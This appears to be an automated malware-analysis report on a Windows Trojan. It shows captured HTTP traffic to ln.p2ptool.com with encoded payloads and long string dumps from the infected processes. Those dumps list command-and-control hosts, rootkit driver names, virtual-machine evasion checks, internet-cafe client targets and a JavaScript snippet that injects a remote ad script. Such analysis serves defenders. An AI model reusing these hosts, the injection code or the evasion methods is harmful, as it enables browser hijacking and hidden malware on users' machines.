nG7eoFIcxR5ZBXAfZ80n/t3CRbL2EdM9lb3yV0POXL7kPN84YR52eCLLspMXZvEmihTEVp
uPTG4fuld53I3hXpxu3jcc6Gzy9iEFlbaXxp2TB3izqYm6KhYBcGT9xymKFVrlMDlYOr1i
0qh4VE3r2UUeuedUOSPYaWBbSvEQ4te5UPX37/SoSyAA23dw h04bzeEcFAzlE9ymBgrqA
vJD4Sr9/MuMIuI9uCYhmDcBUNRmWmbgAcFxq4VydFphMXBg1RWfN7DAFjD1Ey3zHqQ/cCF
Fh1iz33tJH/hMDvi6dFJzZOcqvrD6V2A5sQ941Ft90whRBkHbD3fR SFW61mRTU2JeO1Ml
icxWBsQ0fr/5zh3ThZgVvPcKlAIuG fkCFUeMT Ifg hhd/CkUEgBDb52r8rnUjVNkSXG3
LPhSJ6zr8PAIfQJjH7j2vXzSDkF46by8zQy3jM5x/bTeCzjyWOoPRnEk11Ga6A9f40oelB
k5U6Qrtl39E8J/UsHN1wzYbyYMnDq3xxHoh1929KYyvOW6N12rNbHv0jq4DlCd0MODNYd7
A7Ykr4OqSh//UN6uSJWLKUgN3GlDCNjB3eO3qBI65/j9 7xZLVz1IfyWF32d8joSLzGepV
/9o8Hd47eoEjrnnjjuUMaeX5OVtQXh m6qqDmZJ G Gxc0xK16gJYZ6sxhIK10kLmAt9FS
j0QMavbyRzb aW3zqTxHm2JcvXa4YxrTH1SM4iq 3R3kZ4XlDDSYvcA76EFpcxgFTqcJzd
qzPrftd2tbKiQNwMcl8XdWcdllJ6BRNYnUFwVon5K4UX7ZLePK r5A2XvMZTKXPN/ 
<<< skipped >>>


GET /txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:29 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMl
j6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj
8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVK
k 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWa
brDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0N
mUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxf
KZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSB
J/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI
 WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp
3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHddua
D uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAW
uIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN
4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A
<<< skipped >>>


GET /txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:22 GMT
Content-Type: text/plain
Content-Length: 16040
Last-Modified: Fri, 29 May 2015 10:02:55 GMT
Connection: close
ETag: "5568394f-3ea8"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROxLiD7jYDiIqOfONHrgwkqauSWPBROUZW0sipuK
UBUb5O4eEZ620XI8CzDjkRi4A8lbnGofzhvn5FyHOlJXHHC/5/ 1gVd/aPlu5jX HBtGpM
RW9nZWGzkCKJh2YZVqXz4 9 CYHDHG/UShsQooZeedOexf1uaXRWSRuk94Nh7MJJ3ORJZy
sb3/XoPYupkLGUuEAIpWQMxyuYFLoiO7uVwuccitdBepzJqgporquQ6McIjGHW1sOfYuU6
OCVAsZ3c2jOMUbY1SKSi6ToCA i3Olf377ExOa8q1 3juSINdeL7/FVMiCb1uqWIzZvQiJ
SCKtMrgUx z0bc90X/Xjlb tkwO481xfsHfJ3/lYpiJmdW4xc/xQAyfc9WLgqTwr6eIKTy
HnpP8iIFhUfkIrKH1J/3EytQHmwKhpm9m6p5lZKjiPdAmxGixheGvzjS1ej77jCgUlfvsB
OSiONjuWIQRihHqjoN7wtrKcskgLA1GCq/AveFeIyIhwfPjzcLykiSOJrsFKxyzkFjmmT0
w4Djlu40OtBFmDnjjdBF HTlwEldRcwvrJT0yZzMo3iU52aq6308i4QcC1Koq52xYc2YEv
txZDhkr5JeWveJbMGsOQAy BIq2m0V7XnD1NjlavQVlnmhJqwWEO84/CqSArg50vz8HXik
Jo8KnWPGsfNcm7/uZ3NmDG9mPlwAfscV9NghGNOP7PLfG24obuv80QFfGbeYryL/Ga iez
Cj0VeSj7wbhESI3bewHvj 0x2h0Z0V8CqMUQdstv9PQBpQ9lPEFetlJRrJJfXvEDLlD9SB
/Kgyxh5pTH1P1vGNSFmyfDV6A8RmcG2/k0A8hwBJ2QVbWrqjMKyN3C97emrUMCzPw9JdDn
V5XD4eSrvgpfJLvxR2dHztn2mmoTWiK35X7NIKbas1bpEQ/SpIzgkthD2x5V6s8y/5xtv5
iH3J98HXJCqw8X/avtfIKGFyx51WD/iIlZ0H4sO5A8PjlFz2PHH/TsdPj/PHVneMJ1MQ7B
oGkh2dI7qx4Vn  lCd4K1NQiZ0oe9b5BvLTkli8hNmqqr8sVnLZhVQoTrHFi IPpiLgs79
0l9Yfsg4yMZ3zP0Sfa5B5LUEExQ9f3sAX1KvSEm8r4ilG3h7YaMytANKMnY0ndHH9dwAos
JEiB/huIyUbh27Jyq8ukGRoWHKHsxLksp18gDJQnPZzOOVN H17ZvFemmXQdTaoJcszYvt
25bIf41SEYJ8fnJF6DMkL4g mIuCzv1yA3Bz3KulRQgCeh7MXv6bBYVH5CKyh9Q72kqKux
f3T5VHyiH/1ZNglf/7OC2IiKRUWya2o97rqjztsZxAGYUe8N9EPTBTugSmsMy6ZtejBrAG
MfB95efKS0T1h1swoso/ociqzCHLvHvxtIgurr JFJgdBAcwD1fbSFfl8mA8z3EL8LVHmc
wIoI2naImhUM2PxjmnEn6uEGYgxWhoevT0HuYom4A3mYKvqUdFhwTve3bdLrnpo80y
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_996:

cS\%Xc
f9z.vk
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
omdlg32.dll
SHELL32.dll
OLEPRO32.DLL
WINMM.dll
svchost.exe
.rsrc
P%dTh[
En.yGW
.Kh)"
D.UnQ
!.IB?S
%Sioj
.aMOY
5E.axf
.IMpg
3m.be
~]%%dH
$.na\
ðuz
%xvfR
14.NeDY
i.MIE
38.TF
`L?.tt?c
|&.MG:
w.JtO
a.iNh5
: ).BE
-..zFI
.JKGek
7.aVc
C .nG
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
IPHLPAPI.DLL
MSWSOCK.dll
PSAPI.DLL
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
RegCloseKey
ShellExecuteW
.text
`.rdata
@.data
t.Fj)V
?456789:;<=
!"#$%&'()* ,-./0123
<4,$?7/'
(3-!0,1'8"5.*2$
\\.\SSDTProcess
HideSys.sys
\\.\FixTool
Restore.sys
GetProcessHeap
WinExec
KERNEL32.dll
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegFlushKey
RegCreateKeyExA
iphlpapi.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetCPInfo
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
XXXXXX
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
flist.bin
cmd.exe /c del
XXXXXXXXXXXXXXXX
hXXp://
ATL:X
msvcrt
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeW
TenSafe_1.exe
TenSafe.exe
CreateService Fail %x
OpenSCManager Fail %x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus x
StartService~ x
115.238.251.56
log.soomeng.com
VVV.4278.cn
log.zzinfor.cn
127.0.0.1
zcÁ
h.rdata
H.data
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
ntdll.dll
gdi32.dll
adpro.cn
163.com
126.com
baidu.com
123.sogou.com
hXXps://
VVV.sohu.com
VVV.sina.com
hao123.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
<button name="myad" style="display: none" onclick=" eval(document.getElementById('aa').innerHTML);">Test</button>
[email protected]
atl.dll
kernel32.dll
Kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
pr.Gxz
1.WfM^R
ATL.DLL
COMCTL32.dll
GDI32.dll
OLEAUT32.dll
oledlg.dll
WINSPOOL.DRV
2015.1.20.1
2.0.0.1
1, 5, 1, 1516
1, 0, 0, 444
\Driver\Tcpip

%original file name%.exe_996_rwx_00401000_000C7000:

f9z.vk
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
omdlg32.dll
SHELL32.dll
OLEPRO32.DLL
WINMM.dll
svchost.exe
.rsrc
P%dTh[
En.yGW
.Kh)"
D.UnQ
!.IB?S
%Sioj
.aMOY
5E.axf
.IMpg
3m.be
~]%%dH
$.na\
ðuz
%xvfR
14.NeDY
i.MIE
38.TF
`L?.tt?c
|&.MG:
w.JtO
a.iNh5
: ).BE
-..zFI
.JKGek
7.aVc
C .nG
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
IPHLPAPI.DLL
MSWSOCK.dll
PSAPI.DLL
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
RegCloseKey
ShellExecuteW
.text
`.rdata
@.data
t.Fj)V
?456789:;<=
!"#$%&'()* ,-./0123
<4,$?7/'
(3-!0,1'8"5.*2$
\\.\SSDTProcess
HideSys.sys
\\.\FixTool
Restore.sys
GetProcessHeap
WinExec
KERNEL32.dll
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegFlushKey
RegCreateKeyExA
iphlpapi.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetCPInfo
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
XXXXXX
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
flist.bin
cmd.exe /c del
XXXXXXXXXXXXXXXX
hXXp://
ATL:X
msvcrt
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeW
TenSafe_1.exe
TenSafe.exe
CreateService Fail %x
OpenSCManager Fail %x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus x
StartService~ x
115.238.251.56
log.soomeng.com
VVV.4278.cn
log.zzinfor.cn
127.0.0.1
zcÁ
h.rdata
H.data
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
ntdll.dll
gdi32.dll
adpro.cn
163.com
126.com
baidu.com
123.sogou.com
hXXps://
VVV.sohu.com
VVV.sina.com
hao123.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
<button name="myad" style="display: none" onclick=" eval(document.getElementById('aa').innerHTML);">Test</button>
[email protected]
atl.dll
kernel32.dll
Kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
pr.Gxz
1.WfM^R
2015.1.20.1
2.0.0.1
1, 5, 1, 1516
1, 0, 0, 444
\Driver\Tcpip

svchost.exe_3088:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
cmd.exe
GetProcessWindowStation
operator
MaxPolicyElementKey
pExecutionResource
e:\work\hera\src\common\norm\include\norm\third_party\jsonxx.h
[JSONXX] expression '%s' failed at %s:%d ->
HTTP/1.0 200 OK
Server: HTTPServ/1.0
Content-Type: %s
Content-Length: %d
HTTP/1.0 404 NOT FOUND
<body><h3>The requested URL <font color="red">%s</font> was not found on this server. </h3></body></html>
.html
.jpeg
.json
u.raidmedia.com.cn
update.bainv.net
u.yizuya.com
p.raidmedia.com.cn
tactics.bainv.net
p.yizuya.com
: %s, %s
hera::bi::ReportDataFilter
bi_logic.cc
0.0.0.0
, listen port = %d
hera::bi::Controller::StartTcpServer
[%s - %s] - error code: x
%s:%d(%d)
, cmd:%s
HTTP REQUEST: %s
hera::bi::Controller::OnHttpRequest
{1A1DEA10-5436-4F76-8881-09EF2F713FE8}
{336B8F76-EBF2-431C-9F97-D43ACF2EB81F}
{EF12E22B-3D97-4823-B515-B318BA276A1B}
update_port
tactics_port
l.raidmedia.com.cn
log_port
udp_port
tcp_port
http_port
ddraw.dll
clsmn.exe
pubwinClient.exe
runme.exe
adsec.exe
NSdominatsd.exe
rwyNCMc.exe
UDO.EXE
BarClientView.exe
BarClient.exe
ebClnt.exe
HintClient.exe
eyuscore.exe
eyoorun.exe
I8DeskCliSvr.exe
knbclient.exe
nxpauxsvc.exe
cfgcli.exe
clisvc.exe
BarClientPP.exe
UCheck.exe
RzxMon.exe
RzxClient.exe
wxGlw2CltPlg.wxe
MainPro.exe
JWXFClient.exe
env.cc
vboxtray.exe
vboxservice.exe
vmwareuser.exe
vmwaretray.exe
vmupgradehelper.exe
vmtoolsd.exe
vmacthlp.exe
%s, %s, %s, %s, %s, %s
%s, %s, %s, %s, %s, %d, %d,
upx result: %d
hera_interface.cc
\log.dat
iphlpapi.dll
GetExtendedTcpTable
Psapi.dll
d-d-d d:d:d %s
nbvm_console.cc
hera::bi::Master::CreateUdpListener
nbvm_entry.cc
%d, %d, %d
%d, HTTP
hera::bi::Master::HandleCmdQueryResource
P2SP url
- url: %s, hash: %s
hXXp://%s:%d%s
E:\work\hera\src\common\norm\include\norm/third_party/jsonxx.h
p2sp.cc
hera::p2sp::P2SPClient::HandleCmdReplyResource
%s:%d
tactics_requester.cc
/{1A1DEA10-5436-4F76-8881-09EF2F713FE8}
has<T>(key)
updater.cc
rename_error_and_exec_new_error
[%s] [%s] [%d]
[%s] [%s]
hera::bi::Updater::ExecUpdate
[%s] - [%s]
\\.\nbvm_core_cdo
[u-u-u u:u:u.u]
[u:u:u.u]
[x]
[%s:%d]
%s%s%s%s%s%s
%d.%d.%d.%d
X-X-X-X-X-X
d-d-d d:d:d
create tcp handle failed: not enough memory.
norm::net::iocp::ResManager::TcpCreate
..\iocp\res_manager.cc
new_handle: %u
send tcp handle: %u packet failed: invalid parameter.
norm::net::iocp::ResManager::TcpSend
send tcp handle: %u packet failed: no such handle.
async tcp socket send buffer failed: not created.
norm::net::iocp::TcpSocket::AsyncSend
..\iocp\tcp_socket.cc
async tcp socket send buffer failed: not connected.
async tcp socket send buffer failed: invalid parameter.
WSASend failed, error code: %d.
E:\work\hera\Bin\nbvm.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
SHLWAPI.dll
WS2_32.dll
IPHLPAPI.DLL
PSAPI.DLL
VERSION.dll
SETUPAPI.dll
MSWSOCK.dll
GetCPInfo
GetWindowsDirectoryW
CreateIoCompletionPort
HttpQueryInfoA
InternetOpenUrlA
InternetCrackUrlA
WININET.dll
zcÁ
.reloc
SSSh@
tdSSh8
fSSh<
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
<[email protected]>
hXXp://VVV.oberhumer.com $
94 PEIMPORT 00000030 00000000 00000000 000019e3 2**0 CONTENTS, RELOC, READONLY
100 PEIEREXE 00000006 00000000 00000000 00001a4b 2**0 CONTENTS, RELOC, READONLY
00000000 l d PEIMPORT
00000000 PEIMPORT
00000000 l d PEIEREXE
00000000 PEIEREXE
00000000 xor_key4
00000000 xor_key3
00000000 xor_key2
00000000 xor_key1
00000000 compressed_imports
00000000 start_of_imports
00000003 R_386_32 xor_key4
00000008 R_386_32 xor_key3
0000000d R_386_32 xor_key2
00000012 R_386_32 xor_key1
RELOCATION RECORDS FOR [PEIMPORT]:
00000002 R_386_32 compressed_imports
00000016 R_386_32 start_of_imports
00000015 R_386_PC32 PEIMPORT
RELOCATION RECORDS FOR [PEIEREXE]:
%*d 23s %x %*d %*d %x 2**%d
%x g *ABS* %x 23s
%x%*c%*c%*c%*c%*c%*c%*c%*c 23s %*x 23s
%x ™s 23s
000000000
unknown section %s
unknown symbol %s
undefined symbol '%s' referenced
can not apply reloc '%s:%x' without section '%s'
defineSymbol: symbol '%s' is *ABS*
defineSymbol: symbol '%s' already defined
%-28s 0xx | %-28s 0xx
%-42s%-28s 0xx
unknown relocation type '%s
target out of range (%d,%d,%d) in reloc %s:%x
TLS callbacks are not supported
unsupported resource structure
3/%u,
i386-win32.pe
KERNEL32.DLL
PEIEREXE
PEIMPORT
win32/native applications are not yet supported
win32/os2 files are not yet supported
win32/posix files are not yet supported
PE32/wince files are not yet supported
PE32/EFIapplication files are not yet supported
PE32/EFIbootservicedriver files are not yet supported
PE32/EFIruntimedriver files are not yet supported
PE32/EFIROM files are not yet supported
PE32/xbox files are not yet supported
PE32/windowsbootapplication files are not yet supported
.NET files (win32/.net) are not yet supported
filealign < 0x200 is not yet supported
writeable shared sections not supported (try --force)
xor_key1
xor_key2
xor_key3
xor_key4
start_of_imports
compressed_imports
MSVCR100.dll
_malloc_crt
_amsg_exit
_crt_debugger_hook
UPXLib.dll
4!4%4)4-4
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVHTTPClient@@
.?AVHTTPServer@@
.?AVinvalid_operation@Concurrency@@
.?AV?$_Ref_count@VUdpSocket@iocp@net@norm@@@std@@
.?AV?$_Ref_count@VTcpSocket@iocp@net@norm@@@std@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\26279\svchost.exe
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
9#9'9 9/93979;9?9
2C3k3y35\5c5k5p5t5x5
8 8$8(8,80848
4L4l4
#4*434:4
3 3$3(3,3
2 2$2(2,2024282<2
< <$<(<,<0<4<
5 5,5`5|5
combase.dll
Ekernel32.dll
_ADVAPI32.DLL
mscoree.dll
USER32.DLL
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
sadvapi32.dll
portuguese-brazilian
..\common\norm\include\norm\third_party\jsonxx.cc
ESoftware\Classes\CLSID\{A4FC6719-AFD5-4F8E-8138-B35FA78CD671}
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\ProductVersion
%d.%d-x%d
SOFTWARE\Classes\http\shell\open\command
%s %s
%s,%s,%s,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d
%s-dddddd.log
Badvapi32.dll:
ntdll.dll
c0.0.0.0
uuu.nbl
*.nbl
%suuu.nbl
Assertion failed: %s, file %s, line %d
compress.cpp
compress_lzma.cpp
cresult->result_lzma.pos_bits == (unsigned) s.Properties.pb
cresult->result_lzma.lit_pos_bits == (unsigned) s.Properties.lp
cresult->result_lzma.lit_context_bits == (unsigned) s.Properties.lc
cresult->result_lzma.num_probs == (unsigned) LzmaProps_GetNumProbs(&s.Properties)
s.dicPos <= *dst_len
file.cpp
filter.cpp
filters[index].id == id
h:\d\code2\upx\upx-3.08-src\src\filter/sub8.h
h:\d\code2\upx\upx-3.08-src\src\filter/sub16.h
h:\d\code2\upx\upx-3.08-src\src\filter/sub32.h
h:\d\code2\upx\upx-3.08-src\src\filter/cto.h
h:\d\code2\upx\upx-3.08-src\src\filter/ctoj.h
h:\d\code2\upx\upx-3.08-src\src\filter/ctok.h
h:\d\code2\upx\upx-3.08-src\src\filter/ctojr.h
h:\d\code2\upx\upx-3.08-src\src\filter/ppcbxx.h
linker.cpp
mem.cpp
packer.cpp
ph.level >= 1
ph.level <= 10
cconf.conf_ucl.max_offset == 0 || cconf.conf_ucl.max_offset >= ph.max_offset_found
cconf.conf_ucl.max_match == 0 || cconf.conf_ucl.max_match >= ph.max_match_found
(int)ph.overlap_overhead > 0
opt->cmd == CMD_COMPRESS
isValidCompressionMethod(ph.method)
1 <= ph.level && ph.level <= 10
isValidFilter(ph.filter)
orig_ph.filter == 0
orig_ft.id == 0
best_ph.filter == best_ft.id
best_ph.filter_cto == best_ft.cto
best_ph.overlap_overhead > 0
packer_c.cpp
packer_f.cpp
packhead.cpp
h:\d\code2\upx\upx-3.08-src\src\util.h
pefile.cpp
ppi < oimport soimport
exports - newbase == (int) size
p_w32pe.cpp
n <= oh.filealign
h:\d\code2\upx\upx-3.08-src\src\bptr.h
base_ == other.base_
size_ == other.size_
snprintf.cpp
2015.4.2.1
2.0.0.1

Cattle.exe_2188:

`.rsrc
t.hP$S
t.hd*S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
PhL%S
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
